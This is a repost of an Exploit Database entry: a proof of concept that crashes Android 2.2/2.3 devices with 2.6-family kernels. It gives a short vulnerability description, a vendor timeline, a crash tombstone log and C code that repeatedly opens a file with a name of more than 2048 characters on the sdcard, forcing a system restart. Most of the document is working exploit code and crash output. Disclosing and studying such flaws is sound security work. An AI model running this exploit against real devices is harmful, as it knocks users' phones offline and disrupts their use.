Google Android Kernel 2.6 – Local Denial of Service Crash (PoC)

• Exploit Database
• 12 阅读

• 作者： G13
  日期： 2012-12-09
• 类别：

  • dos
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/23248/

• # Exploit Title: Android Kernel 2.6 Local DoS
  # Date: 12/7/12
  # Author: G13
  # Twitter: @g13net
  # Versions: Android 2.2, 2.3
  # Category: DoS (android)
  #
  
  ##### Vulnerability #####
  
  The Android OS is vulnerable to a local DoS when a filename with a
  length of 2048
  or larger is attempted to be written to the sdcard(vfat fs) multiple times.
  
  The result of successful running of the exploit code is the system restarting.
  
  The vulnerability only effects Android kernels that are in the version
  2.6 family.
  
  ##### Vendor Timeline #####
  
  The Android Security Team has been contacted with updated PoC code and
  details.
  
  They have been aware of this vulnerability for over a year.
  
  ##### Tombstone #####
  
  *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
  Build fingerprint:
  'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
  pid: 349, tid: 363, name: SensorService>>> system_server <<<
  signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
  r0 00000000r1 00000008r2 00000040r3 00000000
  r4 2a114310r5 00000000r6 51504690r7 00000025
  r8 2a114330r9 2a114350sl 00000003fp 00000003
  ip fffd4084sp 51501eb0lr 40039b70pc 40037cf0cpsr 20030010
  d04271bc7bd0b80000d10000000000000000
  d20000000000000000d3427181eae9200000
  d40000000000000000d50000000000000000
  d60000000000000000d70000000000000000
  d80000000000000000d90000000000000000
  d10 0000000000000000d11 0000000000000000
  d12 0000000000000000d13 0000000000000000
  d14 0000000000000000d15 0000000000000000
  d16 3fe99999a0000000d17 3fe999999999999a
  d18 0033003200310030d19 0000000000000000
  d20 3fc554e7eb0eb47cd21 3e66376972bea4d0
  d22 3f4de16b9c24a98fd23 3fb0f4a31edab38b
  d24 3fede16b9c24a98fd25 3fe55559ee5e69f9
  d26 0000000000000000d27 0000000000000000
  d28 0000000000000005d29 0000000000000000
  d30 0000000000000000d31 0000000000000000
  scr 20000010
  
  backtrace:
  #00pc 0000dcf0/system/lib/libc.so (kill+12)
  #01pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #02pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #03pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #04pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #05pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #06pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #07pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #08pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #09pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #10pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #11pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #12pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #13pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #14pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #15pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  #16pc 0000fb6c/system/lib/libc.so (__aeabi_idiv0+8)
  
  ##### PoC #####
  
  #include <stdio.h>
  
  int main(int argc, char** argv) {
  char buf[5000];
  int j,k;
  FILE *fp;
  /* Path to sdcard, typically /sdcard/ */
  strcpy(buf,"/sdcard/");
  for(k=0;k<=2048;k++){
  strcat(buf,"A");
  };
  for(j=0;j<=50;j++){
  fp=fopen(buf,"w");
  };
  return 0;
  }